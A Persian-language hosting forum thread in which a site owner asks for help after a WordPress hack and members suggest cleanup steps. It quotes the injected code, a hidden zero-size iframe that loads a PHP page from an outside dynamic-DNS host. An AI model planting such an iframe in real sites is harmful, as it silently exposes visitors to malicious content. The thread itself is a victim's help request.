مشکل ویروسی شدن سایت و عدم قبول سرویس دهنده!

[djsiamak]

با سلام خدمت تمامی دوستان
نمیدونم جای درستی تاپیک زدم یا نه، اگه درست نیست مدیران لطفا انتقال بدهند.

اما ماجرا از این قراره که سایت ما هک شده و کد زیر داخل سایت ما قرار داده شده ...

کد HTML:

<iframe src="http://ad5f82.dnset.com/b0ab0254bd58eb87/routine/8c7dd922ad47494fc02c38.php" width="0" height="0" frameborder="0">

سایت رو هم با مرورگر کروم و فایرفاکس تست کردم، اجازه ورود به سایت رو نمیده (چند نفر هم از دوستان چک کردند باز هم اجازه ورود نمیده)
چندین سایت رو چک کردم که بر اساس اون سایت ها هم سایت ویروسی هست

کد:

 https://safebrowsing.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://2ax.ir
http://sitecheck.sucuri.net/results/2ax.ir
http://quttera.com/detailed_report/2ax.ir
http://scanurl.net/?u=2ax.ir&uesb=Check+This+URL#results

جالبه بدونید که به پشتیبانی هاستینگ هم تیکت زدم میگن مشکل چیه؟!!!!! کد رو بهشون دادمم فقط تیکت رو به حالت بسته شده در میارن!

djsiamak-resseler.gif



در یاهو مسنجر هم میگن سایت مشکلی نداره و شما بهتره دانش خودتون رو به عنوان نماینده بالا ببرید!! :|
و یک مورد دیگه که چند هفته پیش سایت ها هر روز چندین و چندین بار ارور "خطا در برقراری ارتباط با پایگاه داده" رو میدادن و این ارور فقط برای چند دقیقه پابرجا بود.
هر وقت هم که به پستیبانی تیکت زدم گفتند مشکلی نیست و هروقت ارور داد تیکت بزنید و ...

حالا چند تا سوال دارم از اساتید محترم
1. این کد داخل فایل های قالب نیست! کجا ممکنه باشه؟
2. در این قضیه من و هاستینگ چه کسی مقصر هست؟ (شاید من مقصر هستم که تند صحبت کردم)

- - - Updated - - -

از راه اندازی مجدد وردپرس استفاده کردم، کد حذف شد اما کروم همچنان اجازه ورود به سایت رو نمیده !

[ULTRAWEB]

شاید پلاگین ها دارای باگ باشن که این ایراد و بوجود اورده باشن برای شما
بازم نمیشه دقیق گفت باید مدیر سیستم بهتون کمک کنه

[kianfar]

دوست عزیز احتمالا داخل پلاگین ها و یا قالبی که برای سایتتون نصب کردین کدهایی وجود داشته که از نظر کروم مخرب بوده، آیا اسکریپت و قالب و پلاگین هارو از سایت های معتبری دانلود کردین؟

[djsiamak]

وردپرس رو که از wp-persian دانلود کردم، تمامی پلاگین ها هم از داخل وردپرس نصب کردم و قالب هم از سایت wpdesign.ir !
چند روز پیش هم یکی از فایل های php قالب تغییر داده شده بود و داخلش کد جاوا اسکریپت برای آپلود فایل قرار داده شده بود.
متاسفانه کد رو جایی دخیره نکردم و حذف کردم
شاید شما اساتید کد رو میدید متوجه میشدید که اشکال از کجا باشه

[viva]

مشکل شما استفاده از یک سیستم پر از باگ به اسم ورد پرس هست

[kianfar]

من اینجا یه مقاله مفصل براتون میذارم در این رابطه، زحمت خوندنش با شما دوست عزیز، ممکنه از همون قالبی که رو سایت گذاشتین باشه :

https://my.bluehost.com/cgi/help/570

[Mihan-VPS]

سلام
پلاگین با افزونه ها رو چک کنید
یا حتی مطالب درج شده در صفحه اصلی سایتتون

[djsiamak]

دوستان با همون راه اندازی مجدد مشکل برطرف شده و اون آیفریم داخل کدهای سایت نیست
مرورگر ها هم بدون مشکل اجازه دسترسی به سایت رو میدن
اما اون سایت هایی که دادم، باز هم میگن سایت ویروسی هست
یعنی Real Time نیستند؟!

Google Safe Browsing diagnostic page for 2ax.ir

[LIAN2]

سلام
به مدیر سرور انتقال بدهید که با استفاده از دستور grep این کد iframe را داخل سرور بررسی کنند تا معلوم شود فایل در کجا قرارداد ،‌ ممکن هست امنیت کل سرور به خطر افتاده باشد.

[djsiamak]

سلام
به مدیر سرور انتقال بدهید که با استفاده از دستور grep این کد iframe را داخل سرور بررسی کنند تا معلوم شود فایل در کجا قرارداد ،‌ ممکن هست امنیت کل سرور به خطر افتاده باشد.

سلام
ممنون از لطفتون ولی همون طور که در تیکت ها مشاهده کردید سرویس دهنده میگه مشکلی نیست و تیکت رو به حالت بسته در میاره
و در یاهو هم گفتند شما بیسواد هستید و دانشتون رو افزایش بدید!!! :|